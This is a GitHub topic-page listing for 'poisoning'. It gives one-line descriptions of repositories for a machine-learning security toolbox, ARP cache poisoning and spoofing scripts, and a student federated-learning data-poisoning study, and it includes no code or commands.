Adversarial Robustness Toolbox (ART) - Python Library for Machine Learning Security - Evasion, Poisoning, Extraction, Inference - Red and Blue Teams
-
Updated
Oct 30, 2024 - Python
Adversarial Robustness Toolbox (ART) - Python Library for Machine Learning Security - Evasion, Poisoning, Extraction, Inference - Red and Blue Teams
MITM ARP Cache poisoner implemented with Scapy and also a HTTP sniffer
Python script for arp spoofing
Simulation of FL in python for Digit Recognition ML model. Simulated poisoning attacks and studies their impact.
This study explores the vulnerability of the Federated Learning (FL) model where a portion of clients participating in the FL process is under the control of adversaries who don’t have access to the training data but can access the training model and its parameters.
This is a project by Lane Affield, Emma Gerdeman, and Munachi Okuagu to showcase what we have learned through Drake University's Artificial Intelligence Program
Add a description, image, and links to the poisoning topic page so that developers can more easily learn about it.
To associate your repository with the poisoning topic, visit your repo's landing page and select "manage topics."